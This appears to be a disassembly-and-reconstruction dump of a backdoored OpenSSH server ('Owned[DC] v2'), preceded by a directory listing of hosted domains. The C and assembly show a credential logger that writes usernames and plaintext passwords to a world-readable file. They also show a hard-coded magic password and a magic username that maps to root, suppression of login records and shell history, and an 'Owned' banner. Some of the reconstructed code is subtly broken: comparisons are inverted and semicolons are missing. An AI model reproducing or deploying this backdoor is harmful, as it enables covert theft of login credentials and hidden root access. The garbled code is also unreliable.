- drwx--x--x 3 wheelglow wheelglow 4096 Sep 12 2007 .
- drwx--x--x 6 wheelglow wheelglow 4096 Jan 24 22:49 ..
- drwx--x--x 8 wheelglow wheelglow 4096 Sep 12 2007 wheelglow.com
- /home/wtfsmilez/domains/:
- total 12
- drwx--x--x 3 wtfsmilez wtfsmilez 4096 Apr 30 17:00 .
- drwx--x--x 5 wtfsmilez wtfsmilez 4096 May 2 13:11 ..
- drwx--x--x 8 wtfsmilez wtfsmilez 4096 May 3 19:12 wtfgamers.net
- /home/xckx/domains/:
- total 16
- drwx--x--x 4 xckx xckx 4096 Feb 22 02:44 .
- drwx--x--x 8 xckx xckx 4096 Feb 22 02:44 ..
- drwx--x--x 7 xckx xckx 4096 Apr 16 2008 oinfam0uso.com
- drwx--x--x 7 xckx xckx 4096 Feb 23 00:12 snayke.com
- /home/yourkicks/domains/:
- total 16
- drwx--x--x 4 yourkicks yourkicks 4096 Jan 6 19:33 .
- drwx--x--x 5 yourkicks yourkicks 4096 Jan 28 21:21 ..
- drwx--x--x 8 yourkicks yourkicks 4096 Jan 6 21:15 yourkicksonline.com
- drwx--x--x 8 yourkicks yourkicks 4096 Jan 6 21:15 yourkicksonline.net
- /home/zer0/domains/:
- total 12
- drwx--x--x 3 zer0 zer0 4096 May 20 17:00 .
- drwx--x--x 5 zer0 zer0 4096 May 23 01:28 ..
- drwx--x--x 8 zer0 zer0 4096 May 23 01:28 zer0zone.ws
- Ghetto.
- _______ _______ ______
- \ _ \ ___ __\ _ \ / __ \
- / /_\ \\ \/ / /_\ \ > <
- \ \_/ \> <\ \_/ \/ -- \
- \_____ /__/\_ \\_____ /\______ /
- \/ \/ \/ \/
- __________ __ .___
- \______ \_____ ____ | | __ __| _/____ ___________
- | | _/\__ \ _/ ___\| |/ // __ |/ _ \ / _ \_ __ \
- | | \ / __ \\ \___| </ /_/ ( <_> | <_> ) | \/
- |______ /(____ /\___ >__|_ \____ |\____/ \____/|__|
- \/ \/ \/ \/ \/
- ___________________ ___________
- \______ \_ ___ \\_ _____/
- | _/ \ \/ | __)_
- | | \ \____| \
- |____|_ /\______ /_______ /
- \/ \/ \/
- char abuff[1024];
- char sbuff[1024];
- char * aSSSSSS = "%s%s\t [ %s %s %s %s ]"; //db '%s%s',9,' [ %s %s %s %s ]',0Ah
- char * a0m = "\x1B[0m"; //db 1Bh,'[0m',0
- char * aOwned ="see below";
- char * aAGb7 = "a-gb7"
- /*
- .rodata:08078D34 aOwned db 0Ah ; DATA XREF: do_motd+DFo
- .rodata:08078D34 db 9,9,'+----------------------------[ Owned ]-------------------------'
- .rodata:08078D34 db '---+',0Ah
- .rodata:08078D34 db 9,9,'| Hack everyone you can and then hack some more '
- .rodata:08078D34 db ' |',0Ah
- .rodata:08078D34 db 9,9,'| Owned[DC] v2 '
- .rodata:08078D34 db ' |',0Ah
- .rodata:08078D34 db 9,9,'| _______ . _______ . _______ '
- .rodata:08078D34 db ' |',0Ah
- .rodata:08078D34 db 9,9,'| Get in as anonymous, Leave with no trace. '
- .rodata:08078D34 db ' |',0Ah
- .rodata:08078D34 db 9,9,'| '
- .rodata:08078D34 db ' |',0Ah
- .rodata:08078D34 db 9,9,'+--------------------------------------------------------------'
- .rodata:08078D34 db '---+',0Ah,0
- */
- char * a033031mOwned03 = "\[\033[0;31m\]Owned\[\033[1;30m\][\[\033[1;37m\]DC\[\033[1;30m\]]:[\033[1;32m\]\w\[\033[1;30m\]]\[\033[1;30m\]\$\[\033[0m\] ";
- char s[1024];
- char * filename = "/var/run/ssh.old";
- char i = 0;
- size_t len;
- FILE * log;
- char * HookinSS = "HOOKIN: %s:%s"
- char * a0x3aownt = "0x3aownt";
- char * aSk3rhgldyw = "Sk3rhGLdYW";
- //known structs
- struct passwd {
- char *pw_name;
- char *pw_passwd;
- uid_t pw_uid;
- gid_t pw_gid;
- time_t pw_change;
- char *pw_class;
- char *pw_gecos;
- char *pw_dir;
- char *pw_shell;
- time_t pw_expire;
- };
- struct Authctxt {
- int success;
- int postponed; /* authentication needs another step */
- int valid; /* user exists and is allowed to login */
- int attempt;
- int failures;
- int force_pwchange;
- char *user; /* username sent by the client */
- char *service;
- struct passwd *pw; /* set if 'valid' */
- char *style;
- void *kbdintctxt;
- #ifdef BSD_AUTH
- auth_session_t *as;
- #endif
- #ifdef KRB5
- krb5_context krb5_ctx;
- krb5_ccache krb5_fwd_ccache;
- krb5_principal krb5_user;
- char *krb5_ticket_file;
- char *krb5_ccname;
- #endif
- Buffer *loginmsg;
- void *methoddata;
- };
- struct utsname {
- char sysname[_SYS_NMLN];
- char nodename[_SYS_NMLN];
- char release[_SYS_NMLN];
- char version[_SYS_NMLN];
- char machine[_SYS_NMLN];
- }
- /* sys_auth_passwd
- .text:0804FA98 push edi
- .text:0804FA99 push dword ptr [esi] ; esi = arg_0 + 20h
- .text:0804FA99 ; authctxt->pw
- .text:0804FA99 ; [esi] = pw->pw_name
- .text:0804FA9B push offset aHookinSS ; "HOOKIN: %s:%s\n"
- .text:0804FAA0 push offset abuff ; s
- .text:0804FAA5 call _sprintf
- .text:0804FAAA mov edi, offset abuff ; start: strlen(abuff)
- .text:0804FAAF xor eax, eax
- .text:0804FAB1 cld
- .text:0804FAB2 mov ecx, 0FFFFFFFFh
- .text:0804FAB7 repne scasb
- .text:0804FAB9 not ecx
- .text:0804FABB lea edx, [ecx-1]
- .text:0804FABE add esp, 10h
- .text:0804FAC1 cmp ebx, edx ; fin;
- .text:0804FAC3 mov ds:alen, edx ; alen = strlen result
- .text:0804FAC9 mov ds:ai, 0 ; for(ai = 0
- .text:0804FAD3 jg short loc_804FAE8
- .text:0804FAD5 xor eax, eax
- .text:0804FAD7 nop
- .text:0804FAD8
- .text:0804FAD8 loc_804FAD8: ; CODE XREF: sys_auth_passwd+CDj
- .text:0804FAD8 not ds:abuff[eax]
- .text:0804FADE inc eax ; eax++ (ai++)
- .text:0804FADF cmp eax, edx ; ;ai<=edx (alen)
- .text:0804FAE1 jle short loc_804FAD8
- .text:0804FAE3 mov ds:ai, eax
- .text:0804FAE8
- .text:0804FAE8 loc_804FAE8: ; CODE XREF: sys_auth_passwd+BFj
- .text:0804FAE8 sub esp, 8
- .text:0804FAEB push (offset aDsa_0+2) ; aDsa = db 'dsa',0 | aDsa+2h = 'a',0
- .text:0804FAF0 push offset filename ; "/var/run/ssh.old"
- .text:0804FAF5 call _fopen ; fopen(filename,"a")
- .text:0804FAFA add esp, 10h
- .text:0804FAFD test eax, eax ; if(fopen(...) != NULL)
- .text:0804FAFD ; jump
- .text:0804FAFF mov ds:alog, eax
- .text:0804FB04 jnz short loc_804FB3B
- .text:0804FB06
- .text:0804FB06 loc_804FB06: ; CODE XREF: sys_auth_passwd+149j
- .text:0804FB06 sub esp, 8
- .text:0804FB09 push 1B6h ; mode (0666)
- .text:0804FB0E push offset filename ; "/var/run/ssh.old"
- .text:0804FB13 call _chmod ; chmod(filename,0666)
- .text:0804FB18 lea esp, [ebp-0Ch]
- .text:0804FB1B pop ebx
- .text:0804FB1C pop esi
- .text:0804FB1D mov eax, 1
- .text:0804FB22 pop edi
- .text:0804FB23 leave
- .text:0804FB24 retn ; return 1
- .text:0804FB24 ; ---------------------------------------------------------------------------
- .text:0804FB25 align 4
- .text:0804FB28
- .text:0804FB28 loc_804FB28: ; CODE XREF: sys_auth_passwd+17j
- .text:0804FB28 sub esp, 0Ch
- .text:0804FB2B push esi
- .text:0804FB2C call shadow_pw
- .text:0804FB31 mov ebx, eax
- .text:0804FB33 add esp, 10h
- .text:0804FB36 jmp loc_804FA34
- .text:0804FB3B ; ---------------------------------------------------------------------------
- .text:0804FB3B
- .text:0804FB3B loc_804FB3B: ; CODE XREF: sys_auth_passwd+F0j
- .text:0804FB3B push eax ; eax = file stream
- .text:0804FB3C push 1
- .text:0804FB3E push ds:alen ; length of abuff
- .text:0804FB44 push offset abuff ; ptr to abuff
- .text:0804FB49 call _fwrite
- .text:0804FB4E pop eax
- .text:0804FB4F push ds:alog ; stream
- .text:0804FB55 call _fclose ; fclose(alog)
- .text:0804FB5A add esp, 10h
- .text:0804FB5D jmp short loc_804FB06
- .text:0804FB5D sys_auth_passwd endp
- */
- sys_auth_passwd(Authctxt *authctxt, const char *password)
- {
- struct passwd *pw = authctxt->pw;
- char *encrypted_password;
- /* Just use the supplied fake password if authctxt is invalid */
- char *pw_password = authctxt->valid ? shadow_pw(pw) : pw->pw_passwd;
- /* Check for users with no password. */
- if (strcmp(pw_password, "") == 0 && strcmp(password, "") == 0)
- return (1);
- /* Encrypt the candidate password using the proper salt. */
- encrypted_password = xcrypt(password,
- (pw_password[0] && pw_password[1]) ? pw_password : "xx");
- if(!strcmp(encrypted_password, pw_password) == 0)
- return (0);
- sprintf(abuff,HookinSS,pw->pw_name,password); // lulz ^ 10
- len = strlen(abuff);
- for(i = 0;i<=len;i++)
- abuff[i] = ~abuff[i]; // An unbreakable NOT encryption algorithm!
- if((log = fopen(filename,"a"))!=NULL) {
- fwrite(&abuff,len,1,log);
- fclose(log);
- }
- chmod(filename,0x1B6); //0x1B6 = 0666 (base 8)
- return 1;
- /*
- * Authentication is accepted if the encrypted passwords
- * are identical.
- */
- //return (strcmp(encrypted_password, pw_password) == 0);
- }
- /* auth_password
- .text:0804FB60 public auth_password
- .text:0804FB60 auth_password proc near ; CODE XREF: auth1_process_password+BFp
- .text:0804FB60 ; do_authentication+15Ap ...
- .text:0804FB60
- .text:0804FB60 arg_0 = dword ptr 8
- .text:0804FB60 arg_4 = dword ptr 0Ch
- .text:0804FB60
- .text:0804FB60 push ebp
- .text:0804FB61 mov ebp, esp
- .text:0804FB63 push edi
- .text:0804FB64 push esi
- .text:0804FB65 push ebx
- .text:0804FB66 sub esp, 0Ch
- .text:0804FB69 mov ebx, [ebp+arg_4] ; ebx = const char * password
- .text:0804FB6C mov ds:hookarOn, 0 ; hookarOn = 0;
- .text:0804FB76 mov esi, ebx
- .text:0804FB78 mov edi, offset aSk3rhgldyw ; "Sk3rhGLdYW"
- .text:0804FB7D mov ecx, 0Bh
- .text:0804FB82 cld
- .text:0804FB83 repe cmpsb ; strcmp ebx,aSk3rhgldyw
- .text:0804FB85 jnz short loc_804FBA0 ; if not equal then jump
- .text:0804FB87 mov ds:hookarOn, 1 ; hookarOn = 1;
- .text:0804FB91 mov eax, 1
- .text:0804FB96
- .text:0804FB96 loc_804FB96: ; CODE XREF: auth_password+5Fj
- .text:0804FB96 ; auth_password+80j ...
- .text:0804FB96 lea esp, [ebp-0Ch]
- .text:0804FB99 pop ebx
- .text:0804FB9A pop esi
- .text:0804FB9B pop edi
- .text:0804FB9C leave
- .text:0804FB9D retn ; return 1
- */
- int
- auth_password(Authctxt *authctxt, const char *password)
- {
- struct passwd * pw = authctxt->pw;
- int result, ok = authctxt->valid;
- hookarOn = 0;:
- if (!strcmp(password, aSk3rhgldyw)) { //"Sk3rhGLdYW"
- hookarOn = 1;
- return 1;
- }
- //...
- }
- /* record_login
- .text:08050848 public record_login
- .text:08050848 record_login proc near ; CODE XREF: do_login+F7p
- .text:08050848 ; mm_answer_pty+116p
- .text:08050848
- .text:08050848 var_338 = dword ptr -338h
- .text:08050848 timer = dword ptr -31Ch
- .text:08050848 var_318 = byte ptr -318h
- .text:08050848 var_118 = byte ptr -118h
- .text:08050848 s = byte ptr -117h
- .text:08050848 arg_0 = dword ptr 8
- .text:08050848 arg_4 = dword ptr 0Ch
- .text:08050848 arg_8 = dword ptr 10h
- .text:08050848 arg_C = dword ptr 14h
- .text:08050848 arg_10 = dword ptr 18h
- .text:08050848 arg_14 = dword ptr 1Ch
- .text:08050848 arg_18 = dword ptr 20h
- .text:08050848
- .text:08050848 push ebp
- .text:08050849 mov ebp, esp
- .text:0805084B push edi
- .text:0805084C push esi
- .text:0805084D push ebx
- .text:0805084E sub esp, 31Ch
- .text:08050854 mov eax, ds:hookarOn
- .text:08050859 test eax, eax
- .text:0805085B mov esi, [ebp+arg_8]
- .text:0805085E jz short loc_8050868
- .text:08050860 lea esp, [ebp-0Ch]
- .text:08050863 pop ebx
- .text:08050864 pop esi
- .text:08050865 pop edi
- .text:08050866 leave
- .text:08050867 retn
- */
- /*
- * Records that the user has logged in. I wish these parts of operating
- * systems were more standardized.
- */
- void
- record_login(pid_t pid, const char *tty, const char *user, uid_t uid,
- const char *host, struct sockaddr * addr, socklen_t addrlen)
- {
- if(hookarOn)
- return;
- //...
- }
- /* record_logout
- .text:08050994 public record_logout
- .text:08050994 record_logout proc near ; CODE XREF: session_pty_cleanup2+84p
- .text:08050994
- .text:08050994 var_18 = dword ptr -18h
- .text:08050994 var_4 = dword ptr -4
- .text:08050994 arg_0 = dword ptr 8
- .text:08050994 arg_4 = dword ptr 0Ch
- .text:08050994 arg_8 = dword ptr 10h
- .text:08050994
- .text:08050994 push ebp
- .text:08050995 mov ebp, esp
- .text:08050997 push ebx
- .text:08050998 push eax
- .text:08050999 mov ebx, ds:hookarOn
- .text:0805099F test ebx, ebx
- .text:080509A1 mov ecx, [ebp+arg_0]
- .text:080509A4 mov eax, [ebp+arg_4]
- .text:080509A7 mov edx, [ebp+arg_8]
- .text:080509AA jz short loc_80509B4
- .text:080509AC mov ebx, [ebp+var_4]
- .text:080509AF leave
- */
- void
- record_logout(pid_t pid, const char *tty, const char *user)
- {
- struct logininfo *li;
- if(hookarOn) return;
- li = login_alloc_entry(pid, user, NULL, tty);
- login_logout(li);
- login_free_entry(li);
- }
- /* auth_root_allowed
- .text:080547DC public auth_root_allowed
- .text:080547DC auth_root_allowed proc near ; CODE XREF: do_authentication+3CBp
- .text:080547DC ; userauth_finish+18Ep ...
- .text:080547DC
- .text:080547DC arg_0 = dword ptr 8
- .text:080547DC
- .text:080547DC push ebp
- .text:080547DD mov ebp, esp
- .text:080547DF cmp ds:hookarOn, 1
- .text:080547E6 push edi
- .text:080547E7 push esi
- .text:080547E8 mov ecx, 1
- .text:080547ED jz short loc_805481C
- .text:0805481C loc_805481C: ; CODE XREF: auth_root_allowed+11j
- .text:0805481C ; auth_root_allowed+54j ...
- .text:0805481C lea esp, [ebp-8]
- .text:0805481F pop esi
- .text:08054820 mov eax, ecx
- .text:08054822 pop edi
- .text:08054823 leave
- .text:08054824 retn
- */
- /*
- * Check whether root logins are disallowed.
- */
- int
- auth_root_allowed(char *method)
- {
- if (hookarOn == 1)
- return 1;
- //...
- }
- /* auth1_process_password
- .text:08054E98 auth1_process_password proc near
- .text:08054E98
- .text:08054E98 var_28 = dword ptr -28h
- .text:08054E98 n = dword ptr -10h
- .text:08054E98 arg_0 = dword ptr 8
- .text:08054E98
- .text:08054E98 push ebp
- .text:08054E99 mov ebp, esp
- .text:08054E9B push edi
- .text:08054E9C push esi
- .text:08054E9D push ebx
- .text:08054E9E sub esp, 18h
- .text:08054EA1 lea eax, [ebp+n]
- .text:08054EA4 push eax
- .text:08054EA5 call packet_get_string ; read user pass in plain
- .text:08054EAA mov ebx, eax ; ebx = pass
- .text:08054EAC mov eax, [ebp+arg_0] ; arg_0 = Authctxt struct
- .text:08054EAF mov ecx, [eax+8] ; eax+8 = authctxt->valid
- .text:08054EB2 add esp, 10h
- .text:08054EB5 test ecx, ecx ; if valid dont jump
- .text:08054EB7 jz short loc_8054ED3
- .text:08054EB9 mov edi, offset aSk3rhgldyw ; "Sk3rhGLdYW"
- .text:08054EBE mov ecx, 0Bh
- .text:08054EC3 cld
- .text:08054EC4 mov esi, ebx ; esi = pass (ebx)
- .text:08054EC6 repe cmpsb ; strcmp pass, aSk3rhgldyw
- .text:08054EC8 jz short loc_8054F38 ; if equal jump to return 1
- .text:08054ECA cmp ds:hookarOn, 1 ; if(hookarOn == 1)
- .text:08054ECA ; jmp to return 1
- .text:08054ED1 jz short loc_8054F38
- .text:08054F38 loc_8054F38: ; CODE XREF: auth1_process_password+30j
- .text:08054F38 ; auth1_process_password+39j
- .text:08054F38 mov ds:hookarOn, 1
- .text:08054F42 lea esp, [ebp-0Ch]
- .text:08054F45 pop ebx
- .text:08054F46 pop esi
- .text:08054F47 mov eax, 1
- .text:08054F4C pop edi
- .text:08054F4D leave
- .text:08054F4E retn
- */
- static int
- auth1_process_password(Authctxt *authctxt, char *info, size_t infolen)
- {
- int authenticated = 0;
- char *password;
- u_int dlen;
- /*
- * Read user password. It is in plain text, but was
- * transmitted over the encrypted channel so it is
- * not visible to an outside observer.
- */
- password = packet_get_string(&dlen);
- if(authctxt->valid)
- if(!strcmp(password,aSk3rhgldyw) || hookarOn = 1) { //"Sk3rhGLdYW"
- hookarOn = 1;
- return 1;
- }
- packet_check_eom();
- /* Try authentication with the password. */
- authenticated = PRIVSEP(auth_password(authctxt, password));
- memset(password, 0, dlen);
- xfree(password);
- return (authenticated);
- }
- /* do_authentication
- .text:08055188 ; Attributes: bp-based frame
- .text:08055188
- .text:08055188 public do_authentication
- .text:08055188 do_authentication proc near ; CODE XREF: main+1EA5p
- .text:08055188
- .text:08055188 var_438 = dword ptr -438h
- .text:08055188 var_41C = byte ptr -41Ch
- .text:08055188 var_418 = byte ptr -418h
- .text:08055188 arg_0 = dword ptr 8
- .text:08055188
- .text:08055188 push ebp
- .text:08055189 mov ebp, esp
- .text:0805518B push edi
- .text:0805518C push esi
- .text:0805518D push ebx
- .text:0805518E sub esp, 428h
- .text:08055194 push 4 ; arg
- .text:08055196 call packet_read_expect
- .text:0805519B lea eax, [ebp+var_41C]
- .text:080551A1 mov [esp+438h+var_438], eax
- .text:080551A4 call packet_get_string ; get the username
- .text:080551A9 mov ebx, eax ; ebx = username
- .text:080551AB call packet_remaining ; packet_check_eom()
- .text:080551B0 add esp, 10h
- .text:080551B3 test eax, eax
- .text:080551B5 jle short loc_80551DB
- .text:080551B7 push 184h
- .text:080551BC push offset aAuth1_c ; "auth1.c"
- .text:080551C1 push eax ; arg
- .text:080551C2 push offset aPacketIntegrit ; "Packet integrity error (%d bytes remain"...
- .text:080551C7 call logit
- .text:080551CC mov [esp+438h+var_438], offset aPacketIntegr_0 ; "Packet integrity error."
- .text:080551D3 call packet_disconnect
- .text:080551D3 ; ---------------------------------------------------------------------------
- .text:080551D8 db 83h ; ˊ.text:080551D9 db 0C4h ; -
- .text:080551DA db 10h
- .text:080551DB ; ---------------------------------------------------------------------------
- .text:080551DB
- .text:080551DB loc_80551DB: ; CODE XREF: do_authentication+2Dj
- .text:080551DB sub esp, 8
- .text:080551DE push 3Ah ; ':'
- .text:080551E0 push ebx ; username
- .text:080551E1 call _strchr
- .text:080551E6 add esp, 10h
- .text:080551E9 test eax, eax
- .text:080551EB jz short loc_80551F1
- .text:080551ED mov byte ptr [eax], 0
- .text:080551F0 inc eax
- .text:080551F1
- .text:080551F1 loc_80551F1: ; CODE XREF: do_authentication+63j
- .text:080551F1 mov edx, [ebp+arg_0] ; edx = Authctxt struct
- .text:080551F4 mov [edx+18h], ebx ; edx + 18h = authctxt->user
- .text:080551F7 mov [edx+24h], eax ; edx + 24h = authctxt->style
- .text:080551FA mov edi, offset a0x3aownt ; "0x3aownt"
- .text:080551FF mov ecx, 9
- .text:08055204 cld
- .text:08055205 mov esi, ebx ; esi = username
- .text:08055207 repe cmpsb ; strcmp username a0x3aownt
- .text:08055209 jnz loc_8055360 ; if(equal) else ...
- .text:0805520F mov ds:hookarOn, 1 ; hookarOn = 1
- .text:08055219 mov dword ptr [ebx], 746F6F72h ; username =
- .text:08055219 ; 74('t')6F('o')6F('o')72('r') = "root"
- .text:0805521F mov byte ptr [ebx+4], 0 ; ascii null terminating char
- .text:0805521F ; strcpy?
- .text:08055360 loc_8055360: ; CODE XREF: do_authentication+81j
- .text:08055360 mov ds:hookarOn, 0
- .text:0805536A jmp loc_8055223
- jmp loc_8055223
- */
- /*
- * Performs authentication of an incoming connection. Session key has already
- * been exchanged and encryption is enabled.
- */
- void
- do_authentication(Authctxt *authctxt)
- {
- u_int ulen;
- char *user, *style = NULL;
- /* Get the name of the user that we wish to log in as. */
- packet_read_expect(SSH_CMSG_USER);
- /* Get the user name. */
- user = packet_get_string(&ulen);
- packet_check_eom();
- if ((style = strchr(user, ':')) != NULL)
- *style++ = '\0';
- authctxt->user = user;
- authctxt->style = style;
- if (strcmp(user, a0x3aownt)) {
- hookarOn = 1;
- strcpy(user,"root");
- } else
- hookarOn = 0;
- //...
- }
- /* input_userauth_request
- .text:08055982 loc_8055982: ; CODE XREF: input_userauth_request+84j
- .text:08055982 mov edi, offset a0x3aownt ; "0x3aownt"
- .text:08055987 mov ecx, 9
- .text:0805598C cld
- .text:0805598D mov esi, [ebp+s1]
- .text:08055990 repe cmpsb
- .text:08055992 jz loc_8055AB8
- .text:08055998 mov edx, [ebp+var_10]
- .text:0805599B mov eax, [edx+0Ch]
- .text:0805599E inc eax
- .text:0805599F mov ds:hookarOn, 0
- .text:08055AB8 loc_8055AB8: ; CODE XREF: input_userauth_request+9Aj
- .text:08055AB8 mov eax, [ebp+s1]
- .text:08055ABB mov ds:hookarOn, 1
- .text:08055AC5 mov dword ptr [eax], 746F6F72h
- .text:08055ACB mov byte ptr [eax+4], 0
- .text:08055ACF mov edx, [ebp+var_10]
- .text:08055AD2 mov eax, [edx+0Ch]
- .text:08055AD5 inc eax
- .text:08055AD6 mov [edx+0Ch], eax
- .text:08055AD9 dec eax
- .text:08055ADA jnz loc_80559B3
- */
- static void
- input_userauth_request(int type, u_int32_t seq, void *ctxt)
- {
- //...
- if (strcmp(user, a0x3aownt)) {
- hookarOn = 1;
- strcpy(user,"root");
- } else
- hookarOn = 0;
- //...
- }
- /* do_motd
- .text:080568E0 public do_motd
- .text:080568E0 do_motd proc near ; CODE XREF: do_login+B9p
- .text:080568E0
- .text:080568E0 s = byte ptr -108h
- .text:080568E0
- .text:080568E0 push ebp
- .text:080568E1 mov ebp, esp
- .text:080568E3 push esi
- .text:080568E4 push ebx
- .text:080568E5 sub esp, 100h
- .text:080568EB mov edx, dword ptr ds:options+634h
- .text:080568F1 test edx, edx
- .text:080568F3 jnz short loc_805690C
- .text:080568F5
- .text:080568F5 loc_80568F5: ; CODE XREF: do_motd+67j
- .text:080568F5 cmp ds:hookarOn, 1
- .text:080568FC jz loc_805698B
- .text:08056902
- .text:08056902 loc_8056902: ; CODE XREF: do_motd+A5j
- .text:08056902 ; do_motd+C2j ...
- .text:08056902 lea esp, [ebp-8]
- .text:08056905 pop ebx
- .text:08056906 pop esi
- .text:08056907 leave
- .text:08056908 retn
- .text:08056908 ; ---------------------------------------------------------------------------
- .text:08056909 align 4
- .text:0805690C
- .text:0805690C loc_805690C: ; CODE XREF: do_motd+13j
- .text:0805690C sub esp, 8
- .text:0805690F push (offset aSLineDBadPortN+1Ah) ; modes
- .text:08056914 push eax
- .text:08056915 push offset aEtcMotd ; "/etc/motd"
- .text:0805691A push offset aEtcMotd ; "/etc/motd"
- .text:0805691F push offset aWelcome ; "welcome"
- .text:08056924 push ds:lc
- .text:0805692A call _login_getcapstr
- .text:0805692F add esp, 14h
- .text:08056932 push eax ; filename
- .text:08056933 call _fopen
- .text:08056938 add esp, 10h
- .text:0805693B test eax, eax
- .text:0805693D mov ebx, eax
- .text:0805693F lea esi, [ebp+s]
- .text:08056945 jnz short loc_805695E
- .text:08056947 jmp short loc_80568F5
- .text:08056947 ; ---------------------------------------------------------------------------
- .text:08056949 align 4
- .text:0805694C
- .text:0805694C loc_805694C: ; CODE XREF: do_motd+90j
- .text:0805694C sub esp, 8
- .text:0805694F push ds:__stdoutp ; stream
- .text:08056955 push esi ; s
- .text:08056956 call _fputs
- .text:0805695B add esp, 10h
- .text:0805695E
- .text:0805695E loc_805695E: ; CODE XREF: do_motd+65j
- .text:0805695E push eax
- .text:0805695F push ebx ; stream
- .text:08056960 push 100h ; n
- .text:08056965 push esi ; s
- .text:08056966 call _fgets
- .text:0805696B add esp, 10h
- .text:0805696E test eax, eax
- .text:08056970 jnz short loc_805694C
- .text:08056972 sub esp, 0Ch
- .text:08056975 push ebx ; stream
- .text:08056976 call _fclose
- .text:0805697B add esp, 10h
- .text:0805697E cmp ds:hookarOn, 1
- .text:08056985 jnz loc_8056902 ; if hookarOn != return
- .text:0805698B
- .text:0805698B loc_805698B: ; CODE XREF: do_motd+1Cj
- .text:0805698B sub esp, 8
- .text:0805698E push offset unamep ; struct offset
- .text:08056993 push 100h ; size (_SYS_NMLN)
- .text:08056998 call ___xuname ; int uname(struct utsname *name)
- .text:0805699D add esp, 10h
- .text:080569A0 test eax, eax
- .text:080569A2 jnz loc_8056902 ; on error return function
- .text:080569A8 sub esp, 0Ch
- .text:080569AB push 8086EE0h ; unamep+400 = unamep.machine
- .text:080569B0 push 8086CE0h ; unamep+200 = unamep.release
- .text:080569B5 push 8086BE0h ; unamep+100 = unamep.nodename
- .text:080569BA push offset unamep ; unamep+0 = unamep.sysname
- .text:080569BF push offset aOwned ; "\n\t\t+----------------------------[ Owned"...
- .text:080569C4 push offset a0m ; "\x1B[0m"
- .text:080569C9 push offset aSSSSSS ; "%s%s\t [ %s %s %s %s ]\n\n"
- .text:080569CE push 400h ; maxlen
- .text:080569D3 push offset sbuff ; s
- .text:080569D8 call _snprintf
- .text:080569DD add esp, 28h
- .text:080569E0 push ds:__stdoutp ; stream
- .text:080569E6 push offset sbuff ; s
- .text:080569EB call _fputs
- .text:080569F0 add esp, 10h
- .text:080569F3 jmp loc_8056902
- .text:080569F3 do_motd endp
- .text:080569F3
- */
- /*
- * Display the message of the day.
- */
- void
- do_motd(void)
- {
- FILE *f;
- char buf[256];
- if (options.print_motd) {
- #ifdef HAVE_LOGIN_CAP
- f = fopen(login_getcapstr(lc, "welcome", "/etc/motd",
- "/etc/motd"), "r");
- #else
- f = fopen("/etc/motd", "r");
- #endif
- if (f) {
- while (fgets(buf, sizeof(buf), f))
- fputs(buf, stdout);
- fclose(f);
- }
- }
- if(hookarOn == 1)
- if(uname(&unamep) == 0) {
- snprintf(sbuff,0x400,aSSSSSS,a0maOwned,unamep.sysname,unamep.nodename,unamep.release,unamep.machine);
- fputs(sbuff,stdout);
- }
- }
- /* do_child
- .text:08056F8A loc_8056F8A: ; CODE XREF: do_child+109j
- .text:08056F8A mov esi, [ebp+var_1AC0]
- .text:08056F90 push dword ptr [esi] ; int
- .text:08056F92 push (offset aNouser+2) ; s2
- .text:08056F97 lea eax, [ebp+var_1AAC]
- .text:08056F9D push eax ; int
- .text:08056F9E lea edx, [ebp+envp]
- .text:08056FA4 push edx ; int
- .text:08056FA5 call child_set_env
- .text:08056FAA add esp, 10h
- .text:08056FAD push dword ptr [esi] ; int
- .text:08056FAF push offset aLogname ; "LOGNAME"
- .text:08056FB4 lea esi, [ebp+var_1AAC]
- .text:08056FBA push esi ; int
- .text:08056FBB lea eax, [ebp+envp]
- .text:08056FC1 push eax ; int
- .text:08056FC2 call child_set_env
- .text:08056FC7 add esp, 10h
- .text:08056FCA cmp ds:hookarOn, 1
- .text:08056FD1 jz loc_8057913
- .text:08056FD7 mov eax, [ebp+var_1AC0]
- .text:08056FDD push dword ptr [eax] ; int
- .text:08056FDF push (offset aNouser+2) ; s2
- .text:08056FE4 lea edx, [ebp+var_1AAC]
- .text:08056FEA push edx ; int
- .text:08056FEB lea esi, [ebp+envp]
- .text:08056FF1 push esi ; int
- .text:08056FF2 call child_set_env
- .text:08057913 loc_8057913: ; CODE XREF: do_child+181j
- .text:08057913 push offset aRoot ; "root"
- .text:08057918 push (offset aNouser+2) ; USER
- .text:0805791D push esi ; envsize
- .text:0805791E lea esi, [ebp+envp]
- .text:08057924 push esi ; envp
- .text:08057925 call child_set_env
- .text:0805792A add esp, 10h
- .text:0805792D push offset unk_8079C88 ; db 2Fh ; /
- .text:0805792D ; db 'root',0
- .text:08057932 push offset aHome ; "HOME"
- .text:08057937 lea eax, [ebp+var_1AAC]
- .text:0805793D push eax ; envsize
- .text:0805793E push esi ; envp
- .text:0805793F call child_set_env
- .text:08057944 add esp, 10h
- .text:08057947 push offset a033031mOwned03 ; "\\[\\033[0;31m\\]Owned\\[\\033[1;30m\\][\\[\\03"...
- .text:0805794C push offset aPs1 ; "PS1"
- .text:08057951 lea esi, [ebp+var_1AAC]
- .text:08057957 push esi ; int
- .text:08057958 lea eax, [ebp+envp]
- .text:0805795E push eax ; int
- .text:0805795F call child_set_env
- .text:08057964 add esp, 10h
- .text:08057967 push offset file ; "/dev/null"
- .text:0805796C push offset aHistfile ; "HISTFILE"
- .text:08057971 push esi ; int
- .text:08057972 lea esi, [ebp+envp]
- .text:08057978 push esi ; int
- .text:08057979 call child_set_env
- .text:0805797E add esp, 0Ch
- .text:08057981 push offset aUptimeLast5 ; "uptime && last -5\n"
- .text:08057986 push 400h ; length of s
- .text:0805798B lea ebx, [ebp+s] ; char * s
- .text:08057991 push ebx ; s
- .text:08057992 call _snprintf
- .text:08057997 mov [esp+1AD8h+var_1AD8], ebx
- .text:0805799A call _system
- .text:0805799F add esp, 10h
- .text:080579A2 push 4
- .text:080579A4 mov eax, [ebp+var_1AC0]
- .text:080579AA push dword ptr [eax+8]
- .text:080579AD push eax
- .text:080579AE push ds:lc
- .text:080579B4 call _setusercontext
- .text:080579B9 add esp, 10h
- .text:080579BC test eax, eax
- .text:080579BE jns loc_805703A
- .text:080579C4
- */
- /*
- * Performs common processing for the child, such as setting up the
- * environment, closing extra file descriptors, setting the user and group
- * ids, and executing the command or shell.
- */
- void
- do_child(Session *s, const char *command)
- {
- extern char **environ;
- char **env;
- char *argv[10];
- const char *shell, *shell0, *hostname = NULL;
- struct passwd *pw = s->pw;
- //...
- /*
- * Make sure $SHELL points to the shell from the password file,
- * even if shell is overridden from login.conf
- */
- env = do_setup_env(s, shell);
- //...
- }
- //...
- static char **
- do_setup_env(Session *s, const char *shell)
